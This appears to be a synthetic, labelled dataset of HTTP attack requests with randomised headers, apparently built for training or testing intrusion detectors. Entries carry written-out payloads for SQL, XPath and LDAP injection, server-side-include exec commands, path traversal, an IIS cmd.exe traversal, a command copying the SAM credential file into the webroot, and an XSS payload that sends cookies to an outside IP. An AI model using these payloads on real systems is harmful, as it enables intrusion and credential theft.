Content-Type: application/x-www-form-urlencoded
Last-Modified: Sun, 13 May 07 09:38:15 CET
Host: www.dwtshhsfjy.gov:01658
Connection: enoceu0
Accept: video/mpeg;q=0.8, application/zip
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: i-qhxr;q=0.8
Cookie2: $Version="5"
Date: Mon, 06 Dec 04 06:47:07 CET
If-Unmodified-Since: Sat, 07 Feb 04 05:24:47 UTC
If-Range: Mon, 25 May 09 10:40:34 UTC
Max-Forwards: 35
Referer: http://Ursen9.com/9bihcd.jsp
User-Agent: Mozilla/0.9 (compatible; MSIE 1.9; Unix; gooqLteot; eels8a)

tm9ftracktntf=<!--    #exec    cmd="c:\progra~1\hMhw\eacae21hd\atyeej.exe     d:\mntyu1o\www.tiateset.org\g1hIhdi9sn\database.mdb    /x  exporttofoxpro"-->&tK0dD.MUHsiframe5= otasu=includeSU&Lgab=1522162&P@N2WkdIeD=E@e&betweene7G= %&2optQFnL.=sie(betweenA:hredeleteypsJ Aietelnet&ihhba=snk98&nssEtreuazEt2t=lnhtaccesa 

End - Id: 36384
Start - Id: 49156
class: XPathInjection
GET /7ohs/hFl3Q-QPUvZpsEut0C/e9LvF.sUFefxfOv9j.nsf?delae7ho6gt=l1&pa=istrcyd&unilohetnercn=din&yrrhtefcE9o=passthru+e&mspolneCsia=jE0&ue=wErjF8BD&oiis=4mshumeftelsToiey&98Ystdinjbf8i6i=ch8okz5aNXt7yhz&gYFtT=81&tAdkite4enZqdoe=eitiy%2Fsaec07%2Feedan%2Fchild%3A%3Anode%28%29%5B+++++position%28%29%3D8%5D++%7C+++js%2F3uvd%2F7csdf%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D84%5D+++++or+++%27afeHohRo%27%3D+++%27 HTTP/1.1
Host: 202.214.179.178:80
Connection: efadd
Accept: */*;q=0.2
Accept-Charset: x-mac-greek
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: min-fresh=63458
Client-ip: 38.175.250.11
Cookie: nledc=96;hle=io96RU95j
Cookie2: $Version="052"
Date: Wed, 12 Apr 06 09:03:56 GMT
ETag: "HjF@45Djy@lcchXqG"
Expect: 100-continue
From: esgt1xrh@tidc.com
If-Modified-Since: Wed, 23 Mar 05 22:12:40 UTC
If-Unmodified-Since: Sun, 12 Dec 04 22:21:01 UTC
If-Match: "0RYhKtFgl@DG.dlBDTr"
If-None-Match: "Mazg8XbKL3VIELWPOlY5"
If-Range: Thu, 05 Apr 07 18:36:57 CET
Max-Forwards: 3123
MIME-Version: 5.8
Pragma: eimnie='toeg'
Proxy-Authorization: Digest opaque="Mpzdea"
Authorization: woeb tyitxgi=npaonat
Range: -441207,31726-,-3
Referer: http://www.aI1ti.biz/pbyqotQa/krEn/0zlsbis/nmht.php
TE: trailers
Trailer: Pragma
User-Agent: eIeieCshanateRno
UA-CPU: MIPS
UA-Disp: 8001,6616,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 7758x5013
Via: FTP/7.3 133.157.167.78, 6.1 www.Dmtfeefa.css
Transfer-Encoding: gzip
Upgrade: rMm/8.7
Warning: 246 47.3.57.5 "Oy3t1cdrbj" "Mon, 24 Sep 07 19:56:45 GMT"
X-Forwarded-For: 236.225.195.192
X-Serial-Number: 017399203750342
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49156
Start - Id: 46163
class: PathTransversal
GET /hfC2KWqKi4Hi7D_Zt/uvDTP/t8i.mdb?iteOeEt2mo3=plvie7-Ciedag&dyHRghx=y+t%27e&dae0eeynteiE=FgmdI0r&Ojnr4n=1HFRbJ3rew&4thde=Snn&inefpr=Emeandr&oxariifltD=tsystemtl%27731hgtnnst&0gVTo0Y.=t7einiw&d8te0n0hsluP=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion&sooADdnoxcAaa=8691506067&KNtBEBDO3childetcH=tonboe&ts98=527403&6exXtelnetA9=tnco4tnetcat+h%29dbat&ujMsiyubasiursm=065384661 HTTP/1.1
Host: 127.231.227.203
Connection: keep-alive
Accept: text/xml, application/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: naug8-tnil, tg1e-m, 7t6avrrr-fyJbjTs, w-ifntfs;q=0.7, axai-rjsd;q=0.2
Cache-Control: shgteeD='ltbiHkc9'
Client-ip: 172.17.95.67
Cookie: nadb=rqlcb;j>sOoro%Sreo;ttana=@F+;uGQPwFPin=tnsof8bevqgodn8sc
Cookie2: $Version="276"
Date: Wed, 23 Jan 08 19:00:41 GMT
ETag: W/"IKbJLxE1_ixqcRxyA"
Expect: xslbWe=dne4
From: itSee@io7o.gov
If-Modified-Since: Fri, 26 Sep 08 18:24:30 UTC
If-Unmodified-Since: Mon, 09 May 05 24:55:06 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 08 Apr 04 02:32:00 UTC
Max-Forwards: 7602
MIME-Version: 2.2
Pragma: weP='bYtu'
Proxy-Authorization: slso ala9=euegghy
Authorization: Basic dGxkc2FBMHo6b2l6ZUw=
Range: 6-,3215-
Referer: /uepokzRo/ia18gny7.pl
TE: trailers,gzip,gzip
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.1 (Machintosh; U; PPC 3.6; 9u-c3; rv:2.1.2) Gecko/54547236
UA-CPU: StrongARM
UA-Disp: 5013,9581,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 390x0476
Via: FTP/8.2 231.127.23.171, 1.0 49.48.151.241, 7.2 www.ysemrn.js
Transfer-Encoding: styatH
Upgrade: efs/0.6
Warning: 823 25.141.143.47 "taoks5" "Fri, 20 May 05 04:28:26 GMT"
X-Forwarded-For: 7.188.220.215
X-Serial-Number: 143207616945
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46163
Start - Id: 37657
class: LdapInjection
POST /node5hRVX@JA--Mftp/t_DXXMo5brPx/fftptUrbsa/ac2vDGOsldbzx_cnN/B0LQkOTmDQi.png? HTTP/1.1
Content-Length: 123
Content-Language: olihe,mtgf2toi
Content-Encoding: identity
Content-Location: /nexpm9eO/feayi/vnzA/ssrucph.pl
Content-MD5: Ympyb2hlU3NieXdTYnNueQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 31 Mar 04 06:33:46 GMT
Last-Modified: Sat, 23 Oct 04 22:44:05 UTC
Host: www.med2mror.net
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.7
Accept-Encoding: deflate;q=0.0, identity, compress;q=0.5
Accept-Language: ees-5staa, vsuedcm-iRsAxY
Cache-Control: max-age=18849
Client-ip: 88.224.210.21
Cookie: mdodolaak=6815;vsteh=leso;nehvrNday1d=e$og;aa2lyoRhaete=afe noad
Cookie2: $Version="878"
Date: Fri, 15 Jan 10 04:42:10 UTC
ETag: "L1wKH0qc0h5OgNanY"
Expect: dI7o=fopMiaaa;che6mei=fphDmee
From: p9ot@shsomno.org
If-Modified-Since: Sun, 01 Feb 09 01:27:21 GMT
If-Unmodified-Since: Sun, 10 Dec 06 08:43:19 CET
If-Match: "NBdhm5sq3xstri0-WP0_"
If-None-Match: *
If-Range: *
Max-Forwards: 076
MIME-Version: 8.2
Pragma: ww=oey
Proxy-Authorization: Digest username="oowuyy"
Authorization: Digest qop=elac
Range: 7-75,773-,28-851
Referer: /rnzeoIp/S5le/r0p5x/auhy.txt
TE: deflate;q=0.0,chunked
Trailer: Accept
User-Agent: Mozilla/1.7 (compatible; MSIE 0.1; Linux i386; eeEeqpa; k3C4; Ieete)
UA-CPU: StrongARM
UA-Disp: 8272,2255,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 940x1719
Via: 0.2 106.203.148.102, 5.8 125.243.138.139
Transfer-Encoding: wte6ed
Upgrade: eax/5.3, ftjnro/7.6, slfh/6.3, Men/1.4
Warning: 026 155.240.111.33 "facqeennibgrcecdveu" "Wed, 19 Jul 06 04:22:04 GMT"
X-Forwarded-For: 62.169.63.215
X-Serial-Number: 60981
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

paeism3gErp=cd0wahhmamXEm&ohbifo5TaeaeeU=no481ZQ_f20j&8etSneiiT=")(targetfilter=(o=NetscapeRoot))&ctnC8=nmw

End - Id: 37657
Start - Id: 40966
class: SSI
PUT /hdk7ohu/hjdzFnFo4UPq3QI85gXq/meEug8K/8HtFuCI/YGOd/pXFh2PFJvCJeglTOF/rU.bjTcuall9jhttpAu/n95y3C/crmowefodhfi.png? HTTP/1.1
Content-Length: 31
Content-Language: enoarh8j,n
Content-Encoding: compress
Content-Location: http://www.niiep.it/c3aoeil/eSj9l/sotr7/noyip6h/te8njafu.bin
Content-MD5: c2l0dHFkaGRtcG9jbzlhYw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 16 Aug 08 08:33:52 CET
Last-Modified: Fri, 17 Sep 04 10:35:27 GMT
Host: 179.194.244.164
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: deflate;q=0.0, deflate, identity;q=0.2, identity;q=0.1
Accept-Language: *
Cache-Control: no-store
Cookie: hcur=16;Sqnyde8r=<!-- #odbc connect="dau,ehai,Y30"    statement="select     *   from   vs2l"-->
Cookie2: $Version="56"
Date: Sun, 07 Mar 10 15:08:32 GMT
ETag: W/"SW16dEtP61Xm@eaVGdp"
Expect: z6jrvla=tgioetyu;dea8ddg1
If-Modified-Since: Fri, 07 May 04 07:56:20 CET
If-Unmodified-Since: Sun, 19 Jun 05 21:19:38 CET
If-Match: *
If-Range: *
Max-Forwards: 373
MIME-Version: 4.2
Pragma: oe=riW
Authorization: aoAFh i1et=ejhsw5t
Range: 12406-,948750-
Referer: /isJe/dteEl8e/naca0i/trmam2e9/dgEg.swf
Trailer: Expect
User-Agent: Mozilla/4.5 (X11; U; Unix 1.5; ox-iA; rv:6.1.3) Gecko/72686448
UA-Color: color16
Via: FTP/7.2 www.iewmaas.html:663, 5.2 243.185.105.195, FTP/6.0 www.rate9.tiff
Transfer-Encoding: deflate
Upgrade: tnrn/8.3, Tpo/9.5, noyBao/0.0, aeoa/8.2

yaen4a=9KZNga6d&duehACdm8ueri=b

End - Id: 40966
Start - Id: 35635
class: XPathInjection
GET /2doS0.php4?no=eXK5PjBVntwU&h_BqY=eQ4&alheF=iobni&teg0ydatcrieuro=taperl&Drsbd=ufete6&3suei=hi3lhomen&uespdrf4e=819&Tiihe=th%27+or+1%3C+ae%2Fartae%2FIlev3D%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D5%5D++or++++%27dh%27++%3D++++%27&iea5eelamN8eiSn=1Dnh HTTP/1.1
Host: 22.115.26.89
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: s5aneace-9H, seoy-ve6, c7-criysl;q=0.4
Cache-Control: no-transform
Client-ip: 71.23.73.207
Cookie: rmXaonebitt=stbdebo9nnAr;vcgdr4igrmereoo=uF1W.FBclty;scriptqQt=aSoJ
Cookie2: $Version="207"
Date: Wed, 23 Nov 05 24:50:44 CET
ETag: W/"MtaA7VKLaZIKhkEV"
Expect: 100-continue
From: rzin8cri@efHTe5.be
If-Modified-Since: Sun, 02 Jul 06 22:53:33 CET
If-Unmodified-Since: Mon, 23 Oct 06 12:40:57 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 03 Feb 10 04:29:02 GMT
Max-Forwards: 44
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Digest opaque="snOLwi"
Authorization: Basic bGVlbnRxOnNvc2U0blI=
Range: -38,162-85,-031
Referer: /eez2e/e6coe.swf
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: Mozilla/1.3 (Windows; U; WinNT 5.8; oS-ed; rv:7.2.7) Gecko/81017212
UA-CPU: Sparc
UA-Disp: 458,730,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 251x7424
Via: FTP/1.7 www.nolik.htm
Transfer-Encoding: gzip
Upgrade: e1e/4.3, eSaj/4.1, rweui/7.2
Warning: 986 www.rBnsrcl.html "5cdarlosaE" 
X-Forwarded-For: 246.53.246.66
X-Serial-Number: 587545
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35635
Start - Id: 35533
class: XPathInjection
PUT /xmNUU.hrFJ9qY.exe? HTTP/1.1
Content-Length: 141
Content-Language: ramWmdh,drnpt,Odarth
Content-Encoding: compress
Content-Location: http://www.m7l8stw.ch/6ehrNaai.jsp
Content-MD5: b2Rkb2Zlbm5laHJhc2x0NQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 02 Mar 09 04:20:16 UTC
Last-Modified: Mon, 14 Sep 09 13:16:10 UTC
Host: 52.19.127.18
Connection: close
Accept: */*;q=0.9
Accept-Charset: utf-7;q=0.8, windows-1252, iso-8859-9, utf-8;q=0.0, x-mac-chinesetrad;q=0.0
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: max-stale
Client-ip: 106.66.65.58
Cookie: oycrtrcgortE=825;inqcltvhltb59=aeHm0XqPdX
Cookie2: $Version="80"
Date: Sat, 11 Sep 04 22:14:32 UTC
ETag: W/"nTFrm6Ac_m@v9GKXfJ4n"
Expect: jeseiyqo=oozs
From: ddsory@ail3hIue.st
If-Modified-Since: Fri, 03 Jul 09 01:12:59 GMT
If-Unmodified-Since: Sat, 20 May 06 19:30:49 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 17 Oct 05 02:28:36 UTC
Max-Forwards: 86
MIME-Version: 8.9
Pragma: sssOa='f'
Proxy-Authorization: Digest nonce
Authorization: Basic dnVhN3M6bnByMmE=
Range: 7-26018,971548-,-1
Referer: /GlxAu7/heh3/xdwn/rxma7s/qhSe.mdb
TE: trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.4 (X11; U; Linux i386 6.5; be-Eb; rv:5.9.4) Gecko/00774674
UA-CPU: 68000
UA-Disp: 740,794,8
UA-Pixels: 502x021
Via: 8.3 164.7.111.234
Transfer-Encoding: identity
Upgrade: hs1gw/0.3, rdt/3.0
Warning: 074 www.hio17hmp.gif "oloAfT" 
X-Forwarded-For: 73.71.14.52
----: -------------

derIhyechr=175     or  1< t/6hdk/au9/child::text()[position()=0]    or 409='] | /* | /foo[bar='

End - Id: 35533
Start - Id: 41964
class: SqlInjection
GET /berfofdusuey/n3eGrbtr.mdb?Leeaneg=i7%2B&u4atiatXeD2adex=53&wrids=%27++OR+%27d%27%3D+%27+&agosns9endrz1n=eOs&TLmhead9rgoma7=pitscriptsdeletet%26es8tebgsound&eqanjscu0aa0=hako HTTP/1.1
Host: 207.45.149.18
Connection: keep-alive
Accept: */*
Accept-Charset: ks_c_5601-1987;q=0.2, euc-kr;q=0.1, windows-1251;q=0.3, cp-932, gb2312
Accept-Encoding: compress;q=0.5, gzip, deflate, deflate
Accept-Language: *
Cache-Control: no-transform
Client-ip: 41.24.155.68
Cookie: 9XcBVs@=ebisbaof;7i5ti=scriptarthd
Cookie2: $Version="14"
Date: Tue, 05 Jul 05 01:18:41 UTC
ETag: W/"sjITGmwJxj-3xzcoIS"
Expect: 2eweYa=sefI;hdtn
From: 4zD9@jt6etwau5.be
If-Modified-Since: Wed, 29 Oct 08 10:17:08 UTC
If-Unmodified-Since: Mon, 03 May 10 20:05:42 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 17 Aug 04 13:01:31 CET
Max-Forwards: 951
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM ZGkxZXMzc09pcnN0N2hzZWFlZWJ0c3U4bWVsa3E3ZWVlaUl0eW11NA==
Range: 170-12,11579-8643,1-
Referer: http://www.Emmi.ch/Eibe/inezho/2bfu/atf4md/em0hlaE.mp3
TE: deflate,gzip;q=0.9,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.5 (Windows; U; Win 9x 9.1; yy-an; rv:7.8.8) Gecko/43762327
UA-CPU: MIPS
UA-Disp: 4298,556,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1383x317
Via: 9.9 www.4ajaeori.gif
Transfer-Encoding: identity
Upgrade: osgosN/1.6, nzpps/5.5, rhoft/4.2, feo/7.7, htler/3.3
Warning: 494 42.216.10.168:95428 "esi7pe3nyrrtei" "Wed, 28 Apr 10 16:07:09 UTC"
X-Forwarded-For: 88.3.128.18
X-Serial-Number: 41242078999326437
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 41964
Start - Id: 43735
class: OsCommanding
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.tnrOotogae.biz
Connection: close
Accept: application/*;q=0.5, application/x-tar;q=0.3
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: min-fresh=4667
Client-ip: 42.85.153.5
Cookie: atoe=86497;en50tera=rtttometa+g;irleRsia=fatnfoenyatl1;irm=reM5CV4vfK;e7qilM8xs1r2s=sroi%utdmh;3us15oan8=fcetosycu2asn
Cookie2: $Version="25"
Date: Tue, 03 Mar 09 13:57:53 GMT
ETag: W/"G4AsBzyc4BCrx9quAQV"
Expect: eiy7a
From: erev@Ao0tpiRe2.ch
If-Modified-Since: Sun, 05 Jul 09 05:42:37 CET
If-Unmodified-Since: Fri, 09 Sep 05 02:51:57 GMT
If-Match: *
If-None-Match: "9FSPI_Hn2L7hEd9v6"
If-Range: "RjeEnHTVkmsKZIAa"
Max-Forwards: 6
MIME-Version: 0.1
Pragma: hsesoWeK='ush'
Proxy-Authorization: Digest algorithm=MD5
Authorization: ahxct Rtid=eIoquu
Range: -1,-82
Referer: http://www.hTsoO.gov/E2eeahdE.zip
TE: gzip,chunked;q=0.9,gzip;q=0.7
Trailer: Accept-Language
User-Agent: Mozilla/9.1 (X11; U; Open BSD i386 4.8; zt-sa; rv:4.8.6) Gecko/03778223
UA-CPU: 68000
UA-Disp: 903,5806,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 337x2229
Via: 3.6 44.25.229.213, unro/1.2 120.200.85.225
Transfer-Encoding: compress
Upgrade: 2Ytn/5.0, a8qtt/0.1
Warning: 140 www.rnisshet.gif "tr2eit" 
X-Forwarded-For: 101.90.146.184
X-Serial-Number: 94311514979203
----: -----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43735
Start - Id: 42823
class: OsCommanding
POST /Yprocessing-instructionj0XSnph-Oi./045/eszqtpj.js? HTTP/1.0
Content-Length: 253
Content-Language: Itejvdbt,aebdg
Content-Encoding: gzip
Content-Location: /hhEE.exe
Content-MD5: bm9hOWhhZHRhbWRzVWhpcw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 27 Nov 06 15:04:31 GMT
Last-Modified: Mon, 07 Sep 09 14:32:22 GMT
Host: 109.86.62.166
Connection: keep-alive
Accept: text/*
Accept-Charset: windows-1252;q=0.0, euc-tw, hz-gb-2312
Accept-Encoding: 
Accept-Language: oT-Nen0nenh, 11ao-xnie2F;q=0.6
Cache-Control: min-fresh=1603
Client-ip: 114.218.58.189
Cookie: ty=include;6ckolKxdmsYicdx=42413942;ar2irh=5335;ueqz=155419
Cookie2: $Version="444"
Date: Fri, 10 Aug 07 14:24:13 CET
ETag: "5ZPilOmFYaosnwTxq"
If-Modified-Since: Thu, 30 Sep 04 17:58:41 CET
If-Unmodified-Since: Thu, 01 Jan 09 05:59:15 CET
If-Match: "itmYRfSEF_OuuO0xH"
If-None-Match: *
If-Range: "gfpaa.SIUenIVxdO"
Max-Forwards: 2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest uri=http://www.mandee.de/tnwt.php
Referer: /ftto/5nsw/Om78ic/m5iuinmu/tntF.tiff
TE: gzip,chunked;q=0.6,trailers
Trailer: If-Modified-Since
User-Agent: 5wr1YGS4-f http://www.erfgjn9o.de
UA-Pixels: 0367x479
Via: m2ht/6.2 166.13.184.56:2, HTTP/8.9 170.6.70.105
Transfer-Encoding: deflate
X-Forwarded-For: 95.96.130.184
X-Serial-Number: 328285479278468
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

jr1=9UuxMgl5jS9&0ZoDdkg0=178839363&8eauflewSpdtr=cr2n&innolOlt0sdgptr=o6iP=sdtvar]'egueAoprocessing-instructiond&xCLteh49rE=Mv&rsw=eo5a&8Bidm5wN_W=88.245.223.135|    copy c:\winnt\repair\sam._ c:\inetpub\wwwroot\sam.ddd&aefg3c=84

End - Id: 42823
Start - Id: 36145
class: PathTransversal
GET /Kcnull3dv/K@Fnbodywvmsysteme/eocarh0msoo0/nGB202Ld/nSgulst7ea/ie1Ntrnzsaroy/aescffdMhcBkuej/no8uoeUehmrpl5edl4tR/NeOdhcds/rMjbGpDAEaL7v@1m.asmx?hlLeettrekoie=e6bamo%3Abs&0leeosontateia=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&ttoarcY=n%7EdnaaNy81g5oA HTTP/1.1
Host: www.ni3kllmNe.org
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: rleWa-anddRudn, e-hueafkw;q=0.6
Cache-Control: max-stale
Client-ip: 52.138.136.254
Cookie: rqosnhho3d0me=etl;hiTqmalnt=e5so;rmandd=\'lefnisyn;ioS52lbtr=1;uqWdn=fAlnde4hfoasln0;link-7kCeall=sR3zedoiTTad9
Cookie2: $Version="8"
Date: Sat, 24 Apr 10 12:39:05 UTC
ETag: W/"dK-JGragUggQ-4kMui"
Expect: 100-continue
From: aitunw@tegatgpn.uk
If-Modified-Since: Sat, 04 Jul 09 12:04:57 CET
If-Unmodified-Since: Sat, 02 Jun 07 10:22:17 UTC
If-Match: "ME6Y7eQWzaYbH.FiVXa"
If-None-Match: "K43o6XIECWMNYSC"
If-Range: Fri, 26 Oct 07 21:16:20 UTC
Max-Forwards: 17
MIME-Version: 1.7
Pragma: Eohs=trob
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: NTLM U0huczFvcmg3WG5pYXc1ZWladGdua2F6b1RpZGJudG8=
Range: -52194,2-,7-21979
Referer: http://cK6a.de/iaonS.pl
TE: trailers,trailers
Trailer: Connection
User-Agent: arteaatws (e6ybk6)
UA-CPU: MIPS
UA-Disp: 4342,924,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 795x647
Via: FTP/9.8 116.51.161.190, 2.5 www.nVyts.jpg:2502, 9.8 www.6rrnh.css
Transfer-Encoding: identity
Upgrade: bhte/9.7, rertro/9.5
Warning: 851 141.46.27.130 "hnaniEfhYuniiebi" 
X-Forwarded-For: 27.217.111.45
X-Serial-Number: 6486734154619358
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36145
Start - Id: 37719
class: LdapInjection
POST /https028qv2WA5/PrY79xctqi8kY/X@CkscriptwgetVGSUPthA/pi/hP/aR8meh@Aw4BE_mE8Py/i9ynpOcrs8ioaaao/tniiacmMezl4oe/LnnhOPhNwCsyaA/VmailRL@T8QZ_E.jpeg? HTTP/1.0
Content-Length: 184
Content-Language: eitpG6gi,q
Content-Encoding: compress
Content-Location: /et5cl/qleici/iolissy/biegtt/emta2t.jpg
Content-MD5: NEV5bnNwdWlyUDl5YTZyZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 30 Jul 06 18:22:35 UTC
Last-Modified: Sat, 05 Jul 08 23:01:52 CET
Host: 211.185.158.65
Connection: close
Accept: image/*;q=0.0, text/*, audio/x-wav
Accept-Charset: x-mac-korean;q=0.7, windows-1252
Accept-Encoding: compress, gzip, identity;q=0.3, compress;q=0.3, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 221.29.121.34
Cookie: CN_iU0q.4=4;kiCca=694926;0dstylelM=erf:7;d3ew4td=iefw1troarmazr1fhs;ujdtlo7lpDtoGa=eni61e85ifmhyoo
Cookie2: $Version="457"
Date: Thu, 13 Nov 08 06:46:51 CET
ETag: W/"Cs9xygawlnPcuJ3Z1I"
Expect: 100-continue
From: pTja@hlne.com
If-Modified-Since: Wed, 25 Oct 06 05:51:16 UTC
If-Unmodified-Since: Sun, 03 Feb 08 04:57:47 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 11 Oct 08 09:40:41 CET
Max-Forwards: 1891
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Hwhen ljaca=irec
Referer: http://erfCqYe.uk/acoso/taaltt.php3
TE: gzip,trailers
Trailer: Authorization
User-Agent: ai4JUhaxD http://www.s0ct.st
UA-CPU: MIPS
UA-Disp: 2046,4023,32
UA-Color: color16
UA-Pixels: 8766x859
Via: ali6l/5.9 226.192.75.177, FTP/4.7 www.ue5ag.gif
Transfer-Encoding: identity
Upgrade: oOfa/5.4, fNwtol/6.6
X-Forwarded-For: 34.122.30.225
X-Serial-Number: 846902452623
~~~~~: ~~~~~~~~~~~

L6HYj=9483928743&AkOehf0cv=8688)(&(objectClass=ai13)(|(sn   =   o4)(cn=iibn  J*))&9B8EGc=&o  nDOeEnaa&echatsantio3rse=POrlte t\ian e&7soh0oeenft=h$b

End - Id: 37719
Start - Id: 47065
class: XSS
GET /d3iardaqy7/hLxLz225v@Sj/kriooobernseDnEre/3Npnse7eo6ga540rne/h8.fFkpzemJil3bcgZdP/snp43NntGaaI/piyocAbiefCrxtcd/evoacDCh6h/wlLcDT9NL5hjN/eF.mdb?jHo4etatst=15817&tnDea8gst7=9458448&Mn2F@hGwTK=tBjzuO2nj&5kmmDscriptZ=emlV5Md2yOn&oirona=%3Cxml+++++src+++%3D++++%22javascript%3A++++%5Bwindow.open%28%27http%3A%2F%2F93.150.228.16%2Filorin.msf%27%2Bdocument.cookie%29%3B%5D+++%22+%3E&seoqtiuths=eX.kKVUX&dteira37ee2=01 HTTP/1.0
Host: www.4brnahi.net
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 127.63.46.215
Cookie: nfnsA=wgetfrommochav;0firetiionta= uelhy 8 ypBr;ienR=lorehioe1e
Cookie2: $Version="56"
Date: Sun, 30 May 04 05:19:18 GMT
ETag: W/"kR45JZ_ktO5@vv_3fZ"
Expect: 100-continue
From: upMalngr@beooie.cz
If-Modified-Since: Mon, 21 Apr 08 01:37:56 GMT
If-Unmodified-Since: Mon, 18 Jan 10 24:41:25 UTC
If-Match: *
If-None-Match: "0XAYx1qjO7L1yBADR-v"
If-Range: "@7zCEbRjjE36qvoYnh"
Max-Forwards: 7
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest nonce
Range: 53-8432
Referer: http://einaeui.gov/7rXhiebu/r58aeh.cgi
TE: trailers,gzip;q=0.4,deflate;q=0.1
Trailer: Via
User-Agent: Mozilla/5.3 (Machintosh; U; Mac OS X 1.4; uT-ti; rv:3.0.0) Gecko/10043059
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 987x1282
Via: 6.8 www.yxar.jpeg, 7.7 123.64.215.33
Transfer-Encoding: compress
Upgrade: 1yiN/0.8, rtga/9.0
Warning: 889 109.167.98.103 "ceSomrehteyFeh" "Sat, 20 Jan 07 24:44:38 UTC"
X-Forwarded-For: 59.196.39.49
X-Serial-Number: 9140776636485
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 47065
Start - Id: 40394
class: SSI
GET /Oe8e1cttitihbe/ute/elAaiseoln/msVKIkm9/ToaFegl3c3bb.asp?4ynmies0jnl4=8lt&ntcLs=+e6&dali3a7bsiFetdt=7UvKnzPbRX&R@UincludeWfBd=6590905&tnt0hmccnntiih=lrclotT18ouqeaen&nnbeqetoOhssfa=qEgMMU%40RuOi&an0wed5=%5C%2Bwasu&auiNddyn=++cUhome%24%28%28sconnectutena97e&sgZ8=+l&hgs1etlahRmmohr=00271&Ypl1all5E7qLg=45751&jpositionhF=3a4&ma=4005 HTTP/1.0
Host: www.inho.be
Connection: close
Accept: audio/*, text/*;q=0.8
Accept-Encoding: 
Accept-Language: Wliabgor-Opeep, z-1cVtompy;q=0.8, Btnlr-le;q=0.2, ea-t3e
Client-ip: 220.104.64.235
Cookie: cFaFSo=eaI%U@;tteoeidrbiee=5721967369;SlovvaeeosAsTl=<!-- #include   virtual="d:\windows\autoexec.bat" -->;z9qwbbrm9hdgaaa=a0rABe2uhsGose4an;oiD=4491
Date: Sat, 20 Sep 08 01:20:41 GMT
ETag: "K4eepBzju4rF2UhlrnG"
If-Modified-Since: Sun, 31 May 09 16:24:57 GMT
If-Unmodified-Since: Tue, 27 Apr 10 23:00:59 GMT
Max-Forwards: 525
Pragma: tmfFi0t=xsgOLeys
Referer: /katt/eectae/eequft.php4
User-Agent: Mozilla/5.5 (Machintosh; U; PPC 2.8; hd-ye; rv:4.2.0) Gecko/71689050
Via: 3.6 129.92.164.217, 2oA/3.4 235.41.55.205, FTP/2.0 www.rpgypPe.html
X-Forwarded-For: 115.42.201.75
----: -----------------------------------------------

null

End - Id: 40394
Start - Id: 48125
class: XSS
